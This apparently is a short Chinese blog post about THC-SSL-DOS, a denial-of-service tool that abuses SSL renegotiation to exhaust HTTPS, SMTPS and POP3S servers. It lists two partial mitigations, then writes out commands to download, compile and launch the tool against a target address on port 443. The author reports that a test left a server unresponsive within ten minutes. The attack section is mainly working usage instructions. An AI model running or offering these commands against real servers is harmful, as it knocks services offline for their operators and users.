ssl DoS 用https的杯具了

德国黑客10月24日发布了攻击工具,详情请参考 http://www.thc.org/thc-ssl-dos/
可以攻击到 https/smtps/pops 等等 ,目前还没有比较好的解决方法
No real solutions exists. The following steps can mitigate (but not solve) the problem:
1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator

攻击软件安装使用
wget http://www.thc.org/thc-ssl-dos/thc-ssl-dos-1.4.tar.gz
tar xf thc-ssl-dos-1.4.tar.gz
cd thc-ssl-dos-1.4
./configure && make
使用
src/thc-ssl-dos –accept 192.168.0.1 443

我测试了下,内网环境,10分钟 服务器https 服务器失出反应